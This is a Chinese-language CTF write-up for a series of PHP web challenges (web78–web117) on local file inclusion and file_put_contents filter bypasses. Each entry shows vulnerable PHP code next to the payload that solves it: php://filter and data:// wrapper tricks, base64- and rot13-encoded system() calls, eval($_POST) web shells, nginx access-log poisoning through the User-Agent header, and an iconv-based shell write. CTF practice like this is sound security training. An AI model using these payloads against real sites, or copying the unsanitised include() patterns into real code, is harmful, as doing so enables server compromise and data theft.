web78
if(isset($_GET['file'])){
$file = $_GET['file'];
include($file);
}else{
highlight_file(__FILE__);
}
?file=php://filter/convert.base64-encode/resource=flag.php
web79
if(isset($_GET['file'])){
$file = $_GET['file'];
$file = str_replace("php", "???", $file);
include($file);
}else{
highlight_file(__FILE__);
}
1.?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCd0YWMgZmxhZy5waHAnKTs/Pg==
(base64)<?php system('tac flag.php');?>
2.?file=data://text/plain,<?=eval($_POST[1]);?> (post)1=system("tac flag.php");
3.?file=data://text/plain,<?= eval($_GET[1]);?>,&1=system("tac flag.php");
web80
if(isset($_GET['file'])){
$file = $_GET['file'];
$file = str_replace("php", "???", $file);
$file = str_replace("data", "???", $file);
include($file);
}else{
highlight_file(__FILE__);
}
data伪协议被替换,上题解法不能用
使用文件日志传入,解题
日志文件地址:?file=/var/log/nginx/access.log
修改参数:User Agent :<?php eval($_POST[1]);?>
POST: 1=system('ls'); //获得flag文件名fl0g.php
1=system('tac fl0g.php');//获得flag
web81
if(isset($_GET['file'])){
$file = $_GET['file'];
$file = str_replace("php", "???", $file);
$file = str_replace("data", "???", $file);
$file = str_replace(":", "???", $file);
include($file);
}else{
highlight_file(__FILE__);
}
使用文件日志传入,解题
日志文件地址:?file=/var/log/nginx/access.log
修改参数:User Agent :<?= eval($_POST[1]);?>
POST: 1=system('ls'); //获得flag文件名fl0g.php
1=system('tac fl0g.php');//获得flag
web82
web87
if(isset($_GET['file'])){
$file = $_GET['file'];
$content = $_POST['content'];
$file = str_replace("php", "???", $file);
$file = str_replace("data", "???", $file);
$file = str_replace(":", "???", $file);
$file = str_replace(".", "???", $file);
file_put_contents(urldecode($file), "<?php die('大佬别秀了');?>".$content);
}else{
highlight_file(__FILE__);
}
1.将/?file=php://filter/write=string.rot13/resource=1.php进行2次url编码
?file=%25%37%30%25%36%38%25%37%30%25%33%41%25%32%46%25%32%46%25%36%36%25%36%39%25%36%43%25%37%34%25%36%35%25%37%32%25%32%46%25%37%37%25%37%32%25%36%39%25%37%34%25%36%35%25%33%44%25%37%33%25%37%34%25%37%32%25%36%39%25%36%45%25%36%37%25%32%45%25%37%32%25%36%46%25%37%34%25%33%31%25%33%33%25%32%46%25%37%32%25%36%35%25%37%33%25%36%46%25%37%35%25%37%32%25%36%33%25%36%35%25%33%44%25%33%31%25%32%45%25%37%30%25%36%38%25%37%30
2.将(post)content=<?php system('tac f*.php');?> 通过rot13加密
content=<?cuc flfgrz('gnp s*.cuc');?>
3.访问url/1.php,得flag
【学习姿势】
2.file_put_content和死亡·杂糅代码之缘 - 先知社区
web88
if(isset($_GET['file'])){
$file = $_GET['file'];
if(preg_match("/php|\~|\!|\@|\#|\\$|\%|\^|\&|\*|\(|\)|\-|\_|\+|\=|\./i", $file)){
die("error");
}
include($file);
}else{
highlight_file(__FILE__);
}
使用base64加密,避免产生过滤字符?file=data://text/plain;base64,<?php system('tac f*.php');
?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCd0YWMgZioucGhwJyk7
base64编码后,需要删除等号(会过滤)
web116
打开网页,是视频播放。将视频下载,用010打开,发现有png文件,另存后得下图内容。
payload:?file=flag.php
burp抓包,repeater-go得flag
web117
highlight_file(__FILE__);
error_reporting(0);
function filter($x){
if(preg_match('/http|https|utf|zlib|data|input|rot13|base64|string|log|sess/i',$x)){
die('too young too simple sometimes naive!');
}
}
$file=$_GET['file'];
$contents=$_POST['contents'];
filter($file);
file_put_contents($file, "<?php die();?>".$contents);
payload:
?file=php://filter/write=convert.iconv.UCS-2LE.UCS-2BE/resource=a.php
post:contents=?<hp pvela$(P_SO[T]1;)>?
访问/a.php post: 1=system('tac fl*.php'); 得flag